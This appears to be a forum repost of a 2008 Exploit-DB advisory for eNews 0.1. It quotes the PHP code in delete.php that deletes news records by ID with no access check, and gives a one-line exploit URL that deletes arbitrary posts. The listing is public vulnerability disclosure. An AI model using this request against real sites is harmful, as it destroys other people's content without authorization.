- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5882
- Проверка EDB
-
- Пройдено
- Автор
- ILKER KANDEMIR
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2008-06-21
Код:
eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability
Author: iLker Kandemir [MEFISTO]
Script download : http://www.hotscripts.com/Detailed/81086.html
script demo : http://emvvy.com/demos/enews/
site : www.dumenci.net
----------------------------------------------------------------
//poc:
if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) {
$deleteSQL = sprintf("DELETE FROM news WHERE id=%s",
GetSQLValueString($_GET['delete'], "int"));
----------------------------------------------------------------
//exploit :
http://[site]/delete.php?delete=[eNews_id]
----------------------------------------------------------------
tnx : aLL my FriEndZ
# milw0rm.com [2008-06-21]- Источник
- www.exploit-db.com
